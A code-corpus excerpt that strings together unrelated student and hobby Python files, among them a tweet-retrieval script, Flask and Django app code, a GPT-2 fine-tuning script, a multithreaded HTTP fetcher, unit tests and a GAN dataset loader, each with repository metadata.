tweets_file_path = r"D:\Desktop\IR_term_8\IR-tweets---disaster-\dataset_scrapped.csv"
SEARCH_MODELS = {
"tfcs": "Tf-idf w Cosine Sim",
"tfed": "Tf-idf w Euclidean Dist"
}
def returnTweetsBasedOnSearchModel(article_id, searchModel):
return
class DataProcessor:
def __init__(self):
self.titles_data = pd.read_csv(titles_file_path)
self.titles_data = self.titles_data.dropna()
self.tweets_data = pd.read_csv(tweets_file_path)
self.tweets_data = self.tweets_data.dropna()
#self.data.title = self.data.title.astype(str)
#self.porter = PorterStemmer()
#self.get_clean_data()
print ("Data Processor up and ready...")
'''
Tokenizing of article titles should be done beforehand
def tokenize_stem_lower(self, text):
tokens = word_tokenize(text)
tokens = list(filter(lambda x: x.isalpha(), tokens))
tokens = [self.porter.stem(x.lower()) for x in tokens]
return ' '.join(tokens)
def get_clean_data(self):
self.data['clean_text'] = self.data.apply(lambda x: self.tokenize_stem_lower(x.title), axis=1)
return self.data
'''
class CosineSimilarity:
def __init__(self, titles, tweets, type='tfidf'):
self.titles = titles #contains titles data
self.tweets = tweets #contains tweets data
self.vectorizer = self.change_matrix_type(type)
def get_result(self, return_size):
cos_sim = cosine_similarity(self.matrix, self.matrix)
top_ind = np.flip(np.argsort(cos_sim[0]))[1:return_size+1]
top_id = [list(self.matrix.index)[i] for i in top_ind]
# print(top_10_ind ,top_10_id)
self.result = []
for i in top_id:
filt = self.data[self.data.document==i]
for ind, r in filt.iterrows():
rel = r['rel']
text = r['text']
related = r['topic']
score = 0
if related==self.query_id and rel>0:
score = 1
if related==self.query_id and rel==0:
score = -1
self.result.append({'tweet_id':i, 'text': text, 'related_article':related,'score': score})
def query(self, query_id, query_text, return_size=40):
self.query_id = query_id
term_doc = self.vectorizer.fit_transform([query_text]+list(self.data.tweets))
#ind = ['query'] + list(self.documents)
#self.matrix = pd.DataFrame(term_doc.toarray(), columns=self.tweets.get_feature_names(), index=ind)
#self.get_result(return_size)
#return pd.DataFrame(self.result)
def change_matrix_type(self, type):
if type == 'tfidf':
return TfidfVectorizer()
elif type == 'dt':
return CountVectorizer() #transforms the entire word matrix into a set of vectors
else:
print('Type is invalid')
def get_matrix(self):
return self.matrix
class EuclideanDistance:
def __init__(self, data, type='tfidf'):
self.data = data
self.change_matrix_type(type)
self.matrix = None
def get_result(self, return_size):
euclidean = euclidean_distances(self.matrix.values[1:], [self.matrix.values[0]])
top_ind = np.argsort(euclidean.T[0])[:return_size]
top_id = [list(self.matrix.index)[i] for i in top_ind]
# print(sorted(euclidean[:20]),top_10_ind ,top_10_id)
self.result = []
for i in top_id:
filt = self.data[self.data.document==i]
for ind, r in filt.iterrows():
rel = r['rel']
text = r['text']
related = r['topic']
score = 0
if related==self.query_id and rel>0:
score = 1
if related==self.query_id and rel==0:
score = -1
self.result.append({'tweet_id':i, 'text': text, 'related_article':related,'score': score})
def query(self, query_id, query_text, return_size=10):
self.query_id = query_id
term_doc = self.vec.fit_transform([query_text]+list(self.data.clean_text))
ind = ['query'] + list(self.data.document)
self.matrix = pd.DataFrame(term_doc.toarray(), columns=self.vec.get_feature_names(), index=ind)
self.get_result(return_size)
return pd.DataFrame(self.result)
def change_matrix_type(self, type):
if type == 'tfidf':
self.vec = TfidfVectorizer()
elif type == 'dt':
self.vec = CountVectorizer()
else:
print('Type is invalid')
def get_matrix(self):
return self.matrix
dataProcessor = DataProcessor()
tweets = dataProcessor.tweets_data
titles = dataProcessor.titles_data
#display(tweets.head())
#display(titles.head())
sample_query_id = "f7ca322d-c3e8-40d2-841f-9d7250ac72ca"
sample_query_text = "Worcester breakfast club for veterans gives hunger its marching orders"
cosine_similarity = CosineSimilarity(titles = titles, tweets = tweets)
cosine_similarity.vectorizer.fit_transform([sample_query_text])
print (cosine_similarity.vectorizer.get_feature_names())
#cosine_similarity.query(sample_query_id, sample_query_text)
| [
"chiayik_tan@mymail.sutd.edu.sg"
] | chiayik_tan@mymail.sutd.edu.sg |
d1520e9ff57b17017f0d8fbb25972e618c4716d7 | 294b75c805c5528fd6c6ff3d0d820afcafcff1bb | /Py_File/OS_Demo.py | df4ae6f8b49d06f28197d4ce57391a0dff094c5f | [] | no_license | kishansinghverma/C_Python | 7b679730c522c2f566a27540491912670eb0ffae | a96408f6a15e267f716a431d836f704eba9c13dc | refs/heads/master | 2020-06-15T12:29:10.750073 | 2019-12-24T15:51:19 | 2019-12-24T15:51:19 | 195,279,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | import os
import time
f1=open('local.txt', 'r')
current=list(map(float, f1.read().strip().split('/')))
while(True):
f2=open('remote.txt', 'r')
rmt=list(map(float, f2.read().strip().split('/')))
if(current[0] != rmt[0]):
current[0] = rmt[0]
if(current[0]==1):
print('Fan Is Turned On!!')
else:
print('Fan Is Turned Off')
if(current[1] != rmt[1]):
current[1] = rmt[1]
if(current[1]==1):
print('Bulb Is Turned On!!')
else:
print('Bulb Is Turned Off')
if(current[2] != rmt[2]):
current[2] = rmt[2]
print('Temp changed to: ', current[2])
f2=open('local.txt', 'r')
str1=str(current[0])+'/'+str(current[1])+'/'+str(current[2])
if(str(f2.read()) != str1):
f1=open('local.txt', 'w')
f1.write(str1)
f1.close
time.sleep(1)
| [
"kishansinghverma@gmail.com"
] | kishansinghverma@gmail.com |
beb5f16630c055d23a39b70cb7f9dc6234831038 | c3b3b20b0a6d1a22857011b3d93e9090f270b536 | /service/routes/bookinghistory.py | 248752e92fc2b51d6714c6408cf1a298f46316e0 | [] | no_license | mindmedia/thecage-booking-backend-admin | ea105b61801a299ab1fe568ebcf2299157bb3b7a | a0169aaa7e5a42d6b6a9a245a5393fa3712e3d65 | refs/heads/master | 2022-04-12T04:22:58.450042 | 2020-02-28T15:47:25 | 2020-02-28T15:47:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | py | from service.models import (
PurchaseLog,
PurchaseItem,
Pitch,
Product,
Field,
purchase_log_schema,
purchase_logs_schema,
purchase_log2_schema,
purchase_log2s_schema,
purchase_item_schema,
purchase_items_schema,
)
from flask import request, jsonify
from service import app
from datetime import datetime
from service import db
@app.route("/bookinghistory/<Id>", methods=["GET"])
def get_bookinghistory(Id):
current_purchase_log_id = -1
purchaselog_ids = []
purchaseitem_logids = []
return_list = []
purchase_log = (
PurchaseLog.query.order_by(PurchaseLog.timestamp.desc())
.filter_by(customer_id=Id)
.all()
)
results_purchase_log = purchase_log2s_schema.dump(purchase_log)
for result in purchase_log:
purchaselog_ids.append(result.id)
for log_id in purchaselog_ids:
purchase_item = (
PurchaseItem.query.order_by(PurchaseItem.id.desc())
.filter_by(purchase_log_id=log_id)
# .filter(PurchaseItem.end_time > timestamp_now)
.all()
)
results_purchase_item = purchase_items_schema.dump(purchase_item)
for result in purchase_item:
current_purchase_log_id = result.purchase_log_id
if current_purchase_log_id not in purchaseitem_logids:
purchase_log = (
PurchaseLog.query.order_by(PurchaseLog.timestamp.desc())
.filter_by(customer_id=Id, id=current_purchase_log_id)
.all()
)
results_purchase_log = purchase_log2s_schema.dump(purchase_log)
for log in results_purchase_log:
log.setdefault('details', [])
for i in results_purchase_item:
pitch = Pitch.query.get(i['pitch_id'])
i['pitch_id'] = pitch.name
field = Field.query.get(i['field_id'])
i['field_name'] = field.name
product = Product.query.get(i['product_id'])
i['product_id'] = product.name
log['details'].append(i)
return_list.append(log)
purchaseitem_logids.append(result.purchase_log_id)
return jsonify(return_list)
| [
"XINGHAN.17@ichat.sp.edu.eg"
] | XINGHAN.17@ichat.sp.edu.eg |
47853c7c8e53ba4da18af09b6ac41b9c19b4f302 | 579385cc730ddcdd4b96d616c92caace15ac3d58 | /article/migrations/0018_auto_20170715_1051.py | 92429e1f3a578d1fab4b3d49561c8364c4a52406 | [] | no_license | exctac/vedansha.com | f852892fc36ae1b0086b2e836335c8ad6dded962 | 994a116d177192cf4d473c57332df1c6429e97b8 | refs/heads/master | 2020-07-09T18:58:54.171045 | 2018-02-04T21:58:19 | 2018-02-04T21:58:19 | 94,260,387 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,438 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-07-15 10:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('article', '0017_auto_20170715_0828'),
]
operations = [
migrations.AddField(
model_name='article',
name='meta_description',
field=models.TextField(blank=True, verbose_name='Description'),
),
migrations.AddField(
model_name='article',
name='meta_keywords',
field=models.TextField(blank=True, verbose_name='Keywords'),
),
migrations.AddField(
model_name='article',
name='meta_title',
field=models.CharField(blank=True, max_length=255, verbose_name='Title'),
),
migrations.AddField(
model_name='categoryarticle',
name='meta_description',
field=models.TextField(blank=True, verbose_name='Description'),
),
migrations.AddField(
model_name='categoryarticle',
name='meta_keywords',
field=models.TextField(blank=True, verbose_name='Keywords'),
),
migrations.AddField(
model_name='categoryarticle',
name='meta_title',
field=models.CharField(blank=True, max_length=255, verbose_name='Title'),
),
]
| [
"exctac@yandex.ru"
] | exctac@yandex.ru |
3a04c2dd37578c83c5d70a4f932d23003925d731 | e9165ab1ae366130e313a9e748499a672e60fa31 | /setup.py | 7b5446a0eedc212adc3730d566e3c7bd26edbef3 | [
"MIT"
] | permissive | ciaron/stroppy | dfa97320332a0f99aacb0130594322c2c8d989ea | 081f14d50917bd7669b6554719791ceee538b96e | refs/heads/master | 2020-08-27T06:49:39.974647 | 2020-05-25T11:27:04 | 2020-05-25T11:27:04 | 217,275,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="stroppy-ciaron", # Replace with your own username
version="0.0.1",
author="Ciaron Linstead",
author_email="c@ciaron.net",
description="A static site generator for image galleries",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ciaron/stroppy",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
| [
"ciaron.linstead@gmail.com"
] | ciaron.linstead@gmail.com |
acc6e458d0eed26bbf21d9f29e8da48301241569 | 995447d49ea0b6f78ea70fac64959bf39f28556a | /datasets/__init__.py | e6230fde23e7922291a414c79e408227b603e894 | [
"MIT"
] | permissive | hhjung1202/DAtoN | ffcfe389292f8f3429ffc6b04d016bdf40506ee5 | 9d1beff544e695caa3149d6304415889e091cafd | refs/heads/master | 2020-05-18T07:51:43.489041 | 2019-05-03T03:11:44 | 2019-05-03T03:11:44 | 184,278,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | from .mnist import get_mnist
from .usps import get_usps
from .svhn import get_svhn
__all__ = (get_usps, get_mnist, get_svhn)
| [
"hhjung1202@naver.com"
] | hhjung1202@naver.com |
8906dc16d16c453861174bea5e4c2e7b79fdd5f7 | 2730d3aedc279f4cafed721cceacc6afe1f7d18d | /zjh/mccfr_zjh.py | 937a01350490f6bfd1a0ab3ed2b7e58dfbcc9ede | [] | no_license | AIMan-Zzx/zhajinhua | 9e2db235f045b49cd5a72b28a0c8f9a74e8e7982 | 17fa23afc97ad154b48972af9bd206a0c8df87ca | refs/heads/main | 2023-04-20T17:09:28.344371 | 2021-05-06T17:23:56 | 2021-05-06T17:23:56 | 364,983,662 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,173 | py | import numpy as np
import random
from itertools import permutations
from tqdm import tqdm
from typing import Dict, List, Union
import multiprocessing as mp
from collections import defaultdict
from node import MNode as Node
from state import State,Pair
import json
import sys
import os
sys.setrecursionlimit(1000000)
# regret_minimum = -300000
regret_minimum = -100
prune_threshold = 200
def new_game(num_players):
state = State(num_players)
state.licensing()
state.showAllPair()
return state
def sub_train(t,state,node_map,locks = {},alpha=1):
for player in range(state.num_players):
if t > prune_threshold:
chance = np.random.rand()
if chance < .05:
mccfr(player, state, node_map, locks,alpha=alpha)
else:
mccfr(player, state, node_map, locks, prune=True,alpha=alpha)
else:
mccfr(player, state, node_map, locks,alpha=alpha)
def train(iterations,num_players, node_map,locks = {}):#locks: Dict[str, mp.synchronize.Lock] = {}):
for t in tqdm(range(1, iterations + 1), desc='Training'):
state = new_game(num_players)
for player in range(num_players):
if t > prune_threshold:
chance = np.random.rand()
if chance < .05:
mccfr(player, state, node_map,locks)
else:
mccfr(player, state, node_map,locks, prune=True)
else:
mccfr(player, state, node_map,locks)
def mccfr(traverser, state, node_map,locks = {},alpha=1, prune=False):#locks: Dict[str, mp.synchronize.Lock] = {}, prune=False):
turn = state.turn
num_players = state.num_players
player_not_in_hand = not state._liveState[traverser]
if state.terminal:
utility = state.utility()
return utility
elif player_not_in_hand:
payoffs = [0 for _ in range(num_players)]
for index,player in enumerate(state._players):
islive = state._liveState[index]
player = state._players[index]
payoffs[index] = 0 if islive else player.payoff() - 1
return np.array(payoffs)
elif turn == traverser:
info_set = state.info_set()
valid_actions = state.valid_actions()
node = node_map[state.turn].get(info_set, Node(valid_actions))
strategy = node.strategy()
node_util = np.zeros(len(node_map))
util = {action: 0 for action in valid_actions}
explored = set(valid_actions)
for action in valid_actions:
if prune is True and node.regret_sum[action] <= regret_minimum:
# if node.regret_sum[action] < 0:
explored.remove(action)
else:
if action not in strategy:
explored.remove(action)
continue
new_state = state.take(action,deep=True)
returned = mccfr(traverser, new_state, node_map,
locks,alpha,prune=prune)
util[action] = returned[turn]
node_util += returned * strategy[action]
if locks:
locks["regret"].acquire()
for action in explored:
regret = util[action] - node_util[turn]
node.regret_sum[action] += regret * alpha
node_map[state.turn][info_set] = node
if locks:
locks["regret"].release()
return node_util
else:
info_set = state.info_set()
valid_actions = state.valid_actions()
node = node_map[state.turn].get(info_set, Node(valid_actions))
strategy = node.strategy()
actions = list(strategy.keys())
prob = list(strategy.values())
random_action = random.choices(actions, weights=prob)[0]
new_state = state.take(random_action,deep=True)
return mccfr(traverser, new_state, node_map, locks,alpha,prune=prune)
def serialise(node_map,save_path,name="single",locks = {}):
if locks:
locks["regret"].acquire()
filepath = os.path.abspath(("{}/{}_node_map.json").format(save_path,name))
if os.path.isfile(filepath):
with open(filepath, 'r', encoding='UTF-8') as r:
jsonfile = json.load(r)
for key, value in node_map.items():
values = []
valueDict = {}
exsit_values = jsonfile[str(key)]
for sub_key, sub_value in value.items():
if sub_key in exsit_values:
exsit_regret_sum = exsit_values[sub_key]
addresult = []
for acton,prob in sub_value.regret_sum.items():
addresult.append({acton:(float(prob)+exsit_regret_sum["regret_sum"][acton])})
valueDict[sub_key] = {'regret_sum': addresult}
else:
valueDict[sub_key] = {'regret_sum': sub_value.regret_sum}
jsonfile[key] = valueDict
else:
jsonfile = {}
for key, value in node_map.items():
values = []
valueDict = {}
for sub_key, sub_value in value.items():
valueDict[sub_key] = {'regret_sum': sub_value.regret_sum}
jsonfile[key] = valueDict
with open(filepath, 'w', encoding='UTF-8') as w:
file = json.dumps(jsonfile)
w.write(file)
if locks:
locks["regret"].release()
def subgame_slover(state,iter_num=100):
n_players = state.num_players
node_map = {i: {} for i in range(n_players)}
for t in tqdm(range(1, iter_num + 1), desc='Training'):
for i in range(n_players):
if state._liveState[i] and state._flopState[i]:
state.shuffle()
state._pairs[i] = Pair(state._poker[:3])
for player in range(n_players):
if t > prune_threshold:
chance = np.random.rand()
if chance < .05:
mccfr(player, state, node_map)
else:
mccfr(player, state, node_map, prune=True)
else:
mccfr(player, state, node_map)
return node_map
| [
"noreply@github.com"
] | noreply@github.com |
a4e16aa3029986e19186a08d10ba6756a749ef85 | 865bd5e42a4299f78c5e23b5db2bdba2d848ab1d | /Python/75.sort-colors.132268888.ac.python3.py | 420999a7c4e65d780fb46607f6690cc3de47a52b | [] | no_license | zhiymatt/Leetcode | 53f02834fc636bfe559393e9d98c2202b52528e1 | 3a965faee2c9b0ae507991b4d9b81ed0e4912f05 | refs/heads/master | 2020-03-09T08:57:01.796799 | 2018-05-08T22:01:38 | 2018-05-08T22:01:38 | 128,700,683 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py | #
# [75] Sort Colors
#
# https://leetcode.com/problems/sort-colors/description/
#
# algorithms
# Medium (38.90%)
# Total Accepted: 217.5K
# Total Submissions: 559.1K
# Testcase Example: '[0]'
#
#
# Given an array with n objects colored red, white or blue, sort them so that
# objects of the same color are adjacent, with the colors in the order red,
# white and blue.
#
#
#
# Here, we will use the integers 0, 1, and 2 to represent the color red, white,
# and blue respectively.
#
#
#
# Note:
# You are not suppose to use the library's sort function for this problem.
#
#
# click to show follow up.
#
#
# Follow up:
# A rather straight forward solution is a two-pass algorithm using counting
# sort.
# First, iterate the array counting number of 0's, 1's, and 2's, then overwrite
# array with total number of 0's, then 1's and followed by 2's.
# Could you come up with an one-pass algorithm using only constant space?
#
#
#
class Solution:
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
i = j = 0 # i for 0, j for 0 and 1
for k, v in enumerate(nums):
nums[k] = 2
if v < 2:
nums[j] = 1
j += 1
if v == 0:
nums[i] = 0
i += 1
| [
"miylolmiy@gmail.com"
] | miylolmiy@gmail.com |
470680c22dc232542067bccb9341ef99207ae529 | 2b476ebcd5e2b4fdd153b438003c5e2b61d0e9bd | /multiRequests.py | 1b7625147c8e4b11eb90b93a7faa080efb1c535d | [
"MIT"
] | permissive | coolkingcole/py3_multithread_requests | 24b103e3d44c214ce747522619b64cad5ece5605 | f22e445210e7d1b377f5fb4525dd8826525ec791 | refs/heads/main | 2023-02-12T14:05:08.672951 | 2021-01-03T19:50:19 | 2021-01-03T19:50:19 | 324,894,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,650 | py | import queue
import threading
import time
import sys
import requests
class ThreadUrl(threading.Thread):
"""Threaded Url Grab"""
def __init__(self, inqueue, outqueue, kwargs):
threading.Thread.__init__(self)
self.in_queue = inqueue
self.out_queue = outqueue
#self.method = method
self.kwargs = kwargs
def run(self):
while True:
#grabs host from queue
host = self.in_queue.get()
#host = self.in_queue.get(self)
chunk = ""
requestObj = 0
try:
#url = urllib2.urlopen(myurl, timeout=3)
#if self.method =="get":
requestObj = requests.get(host, enumerate(self.kwargs))
#print(host)
except Exception as e:
#print('hit exception....')
requestObj = "request_failed"
print(e)
#pass
chunk = [host, requestObj]
#place chunk into out queue
self.out_queue.put(chunk)
#signals to queue job is done
self.in_queue.task_done()
class DatamineThread(threading.Thread):
"""Threaded Url Grab"""
def __init__(self, out_queue, outList):
threading.Thread.__init__(self)
self.out_queue = out_queue
self.outList = outList
def run(self):
while True:
#grabs host from queue
chunk = self.out_queue.get()
self.outList.append(chunk)
#signals to queue job is done
self.out_queue.task_done()
class multiRequests:
def __init__(self, urlList, threadCount, **kwargs):
self.urlList = urlList
#self.requestType = requestType
#self.options = options
self.threadCount = threadCount
self.kwargs = kwargs
def run(self):
inqueue = queue.Queue()
outqueue = queue.Queue()
requestsLists = []
#spawn a pool of threads, and pass them queue instance
for i in range(self.threadCount):
t = ThreadUrl(inqueue, outqueue, self.kwargs)
t.setDaemon(True)
t.start()
#populate queue with data
for url in self.urlList:
inqueue.put(url)
# the threads for the writer, it only needs one really.
for i in range(2):
dt = DatamineThread(outqueue,requestsLists)#args.output)
dt.setDaemon(True)
dt.start()
#wait on the queue until everything has been processed
inqueue.join()
outqueue.join()
return requestsLists
| [
"noreply@github.com"
] | noreply@github.com |
3bcd8c0c02adfd97e228048b85313243c62ab2ef | 3167e46c75cda7fe5b4550347631b172763fc175 | /test_train.py | 0db583c8df5620c605638499d1c3a2df6a45f4c2 | [] | no_license | SuhaasBhat/CC_DATA | d85e89dbb7451a016787190986158d8c3290dda9 | 96deceddc465fb774380a1bb14673260e9483fd7 | refs/heads/main | 2023-01-23T18:47:13.416663 | 2020-11-09T20:47:27 | 2020-11-09T20:47:27 | 311,454,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | from transformers import GPT2LMHeadModel, GPT2Config, GPT2Tokenizer, LineByLineTextDataset, DataCollatorForLanguageModeling, Trainer, TrainingArguments
from transformers import RobertaTokenizerFast, RobertaForMaskedLM, RobertaConfig
import process_txt_data as ptd
#import torch
tokenizer = GPT2Tokenizer.from_pretrained("gpt2", pad_token = '<pad>')
bertTokenizer = RobertaTokenizerFast.from_pretrained("distilbert-base-uncased")
path = "amfamdata1.txt"
dataset = ptd.AmfamDataset(tokenizer=tokenizer, file_path = path, block_size = 128)
data_collator = DataCollatorForLanguageModeling(tokenizer = tokenizer, mlm = False)
bert_data_collator = DataCollatorForLanguageModeling(tokenizer = bertTokenizer, mlm = True, mlm_probability = 0.15)
#config = GPT2Config()
model = GPT2LMHeadModel.from_pretrained('gpt2')
#device = torch.device('cuda')
#bertConfig = RobertaConfig(
# vocab_size=52_000,
# max_position_embeddings=514,
# num_attention_heads=12,
# num_hidden_layers=6,
# type_vocab_size=1,
#)
##mode ;
bertModel = RobertaForMaskedLM.from_pretrained('distilbert-base-uncased')
#bertModel = RobertaForMaskedLM(config = bertConfig)
training_args = TrainingArguments(
output_dir = "./TrainerAmFamBERTv2",
overwrite_output_dir = True,
num_train_epochs = 1,
per_device_train_batch_size = 32,
save_steps = 1_000,
save_total_limit = 10)
trainer = Trainer(
model = bertModel,
args = training_args,
data_collator = bert_data_collator,
train_dataset = dataset,
prediction_loss_only = True
)
trainer.train()
trainer.save_model("./TrainerAmFamBERTv2")
##I really want to use pytorch for this stuff, the Trainer does not make me happy
| [
"ubuntu@ip-10-160-198-158.ec2.internal"
] | ubuntu@ip-10-160-198-158.ec2.internal |
c7ee79f81e71c46a87d58a9599bef995068c3961 | 5c956c53f4fd9d98a94abf0d8c378a45eb0476b1 | /home/forms.py | 4e1d29850b57766e715f709702292f09e84d68b8 | [] | no_license | PrarthiVyas/Hotelina | 7d3535998784d51201662d1b4460abb57f33ba95 | b865971b3c9abea7d7bea8347a729782a9ed8870 | refs/heads/main | 2023-06-17T04:07:55.413608 | 2021-07-17T11:00:13 | 2021-07-17T11:00:13 | 381,929,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | from django import forms
from .models import *
# Create your forms here.
class AvailableForm(forms.Form):
ROOM_CATEGORIES={
('AC','AC'),
('NON_AC','NON-AC'),
('DELUX','DELUX')
}
room_category=forms.ChoiceField(choices=ROOM_CATEGORIES,required=True)
check_in=forms.DateTimeField(required=True,input_formats=["%Y-%m-%dT%H:%M",])
check_out=forms.DateTimeField(required=True,input_formats=["%Y-%m-%dT%H:%M",])
| [
"prarthivyas218@gmail.com"
] | prarthivyas218@gmail.com |
a0d92a8d6c46aa5a0eb9efd323e336c5e8815128 | 9b64080dac6e4bc586f5af9404a0ea338ce00559 | /tests/test_menu.py | 84404f4bf6d7616f58f57c43d9a4da5de942768c | [] | no_license | KrzysztoPy/tic_tac_toe_simple | 1c7dc183c0e099324b3b5b18f90f281742d19a8c | fff7e02cc654cee5c92b7e828b85fec650274222 | refs/heads/master | 2023-08-07T18:13:48.126489 | 2021-10-01T13:46:55 | 2021-10-01T13:46:55 | 395,326,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,081 | py | from main_menu.main_menu.menu_options import *
from unittest.mock import patch
@patch('xyz.xyz.checking_the_correctness_of_the_selection')
def test_processing_of_external_data_first_is_false(mock_checking_the_correctness_of_the_selection):
mock_checking_the_correctness_of_the_selection.return_value = None
result = data_analysis_for_compilance_with_the_guidelines('mock_none')
assert result is None
# @patch('xyz.xyz.checking_the_correctness_of_the_selection') mock_checking_the_correctness_of_the_selection
def test_processing_of_external_data_first_is_true_sec_is_false():
# mock_checking_the_correctness_of_the_selection.return_value = 4
result = data_analysis_for_compilance_with_the_guidelines('0')
assert result == None
def test_processing_of_external_data_first_and_sec_is_true_select_opt_1():
result = data_analysis_for_compilance_with_the_guidelines('1')
assert result == 1
def test_processing_of_external_data_first_and_sec_is_true_select_opt_2():
result = data_analysis_for_compilance_with_the_guidelines('2')
assert result == 2
def test_processing_of_external_data_first_and_sec_is_true_select_opt_3():
result = data_analysis_for_compilance_with_the_guidelines('3')
assert result == 3
def test_checking_the_correctness_of_the_selection_wrong_input_data_0():
result = check_which_user_data_is_integer('z')
assert result is None
def test_checking_the_correctness_of_the_selection_correct_input_data_0():
result = check_which_user_data_is_integer('0')
assert result is not None
def test_checking_the_correctness_of_the_selection_correct_input_data_1():
result = check_which_user_data_is_integer('-10')
assert result is not None
def test_checking_the_correctness_of_the_selection_correct_input_data_2():
result = check_which_user_data_is_integer('5')
assert result is not None
def test_checking_the_correctness_of_the_selection_correct_input_data_2():
result = check_which_user_data_is_integer(None)
assert result is None
def test_checking_the_correctness_of_the_selection_correct_input_data_2():
result = check_which_user_data_is_integer('')
assert result is None
def test_checking_the_correctness_of_the_range_wrong_range_0():
result = checking_the_correctness_of_the_range(-1)
assert result is None
def test_checking_the_correctness_of_the_range_wrong_range_1():
result = checking_the_correctness_of_the_range(0)
assert result is None
def test_checking_the_correctness_of_the_range_wrong_range_3():
result = checking_the_correctness_of_the_range(4)
assert result is None
def test_checking_the_correctness_of_the_range_wrong_range_4():
result = checking_the_correctness_of_the_range(7)
assert result is None
def test_checking_the_correctness_of_the_range_correct_range_0():
result = checking_the_correctness_of_the_range(1)
assert result is not None
def test_checking_the_correctness_of_the_range_correct_range_1():
result = checking_the_correctness_of_the_range(3)
assert result is not None
| [
"geraltrivia19@gmail.com"
] | geraltrivia19@gmail.com |
6153ed244acbd1deac19c433cbd01c43350d4ff4 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /2gFkEsAqNZrs4yeck_13.py | 0e96182a63f5aad185cacd1b5bcad33ff13d32f2 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | """
Write a function that returns all the elements in an array that are **strictly
greater** than their adjacent left and right neighbors.
### Examples
mini_peaks([4, 5, 2, 1, 4, 9, 7, 2]) ➞ [5, 9]
# 5 has neighbours 4 and 2, both are less than 5.
mini_peaks([1, 2, 1, 1, 3, 2, 5, 4, 4]) ➞ [2, 3, 5]
mini_peaks([1, 2, 3, 4, 5, 6]) ➞ []
### Notes
* Do not count boundary numbers, since they only have **one** left/right neighbor.
* If no such numbers exist, return an empty array.
"""
def mini_peaks(lst):
alist = []
for i in range(1,len(lst)-1):
if lst[i-1] < lst[i] > lst[i+1]:
alist.append(lst[i])
return alist
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
a8e763a04f78152641c42acfb6f4274a34e67f6f | a9555d0e7417db4ea68ab73a46ffe5d6fd7b631a | /chapter2/int_fun.py | 2e74b87088a1f32a9629d9e8e032b87355ff7347 | [] | no_license | bindalraghav/Pythoncodes | ade74f2a8709e609b51ce2c754c4de204cafbf87 | 1d6d11c88ef9ef36826729e557ea95d32dc47b9d | refs/heads/master | 2021-01-03T11:13:25.300928 | 2020-03-18T15:07:20 | 2020-03-18T15:07:20 | 240,052,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | num1=int(input("enter 1st num"))
num2=int(input("enter 2nd num"))
num3=num1+num2
print(num3) | [
"bindalraghav10@gmail.com"
] | bindalraghav10@gmail.com |
879b1c3f764e6498f9a7a553de77fbb731b85af3 | 83fbcbcc674ade1ee920b6fdc6ebc472b3833c76 | /SpinalCord/GANUNet/data0/zgan_dataset.py | 65248e3aa55a3b4ea42832496dc8b37632ed087e | [] | no_license | mulanshine/GitHubResearch | 35b12da7311e7e6c21a613ed20a33e0cada24610 | 95b5b24857a0766ed327baf1ab89715e748ddf89 | refs/heads/master | 2020-05-02T20:27:09.455603 | 2019-04-03T11:07:40 | 2019-04-03T11:07:40 | 175,150,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,816 | py | import os.path
from data.base_dataset import BaseDataset
from data.image_folder import make_dataset
from PIL import Image
import numpy as np
import torch
import torchvision.transforms as transforms
import math
# anisotropic diffusion
def f(lam,b):
return np.exp(-1* (np.power(lam,2))/(np.power(b,2)))
def anisodiff(im, steps, b, lam = 0.25): #takes image input, the number of iterations,
im_new = np.zeros(im.shape, dtype=im.dtype)
for t in range(steps):
dn = im[:-2,1:-1] - im[1:-1,1:-1]
ds = im[2:,1:-1] - im[1:-1,1:-1]
de = im[1:-1,2:] - im[1:-1,1:-1]
dw = im[1:-1,:-2] - im[1:-1,1:-1]
im_new[1:-1,1:-1] = im[1:-1,1:-1] +\
lam * (f(dn,b)*dn + f (ds,b)*ds +
f (de,b)*de + f (dw,b)*dw)
im = im_new
return im
# use(80,48),resize to (80,48) for generator
class ZganDataset(BaseDataset):
@staticmethod
def modify_commandline_options(parser, is_train):
return parser
def initialize(self, opt):
self.opt = opt
self.root = opt.dataroot
self.phase = opt.phase
self.imgdir = os.path.join(opt.dataroot,'cropimage_rect')
self.imgpaths = make_dataset(self.imgdir)
self.imgpaths = sorted(self.imgpaths)
def __getitem__(self, index):
imgpath = self.imgpaths[index]
name = imgpath.split('/')[-1]
imgL = Image.open(imgpath).convert('L')
imgRGB = Image.open(imgpath).convert('RGB')
imgL, image_shape = self.imgtransform_L(imgL,name)
imgRGB, image_shape = self.imgtransform_RGB(imgRGB,name)
aff = self.binary_relation_map(imgL)
# aff = self.compute_relation_map(imgL)
return {'img': imgRGB, 'aff':aff, 'path': imgpath,'shape':image_shape}
def get_padshape(self, image):
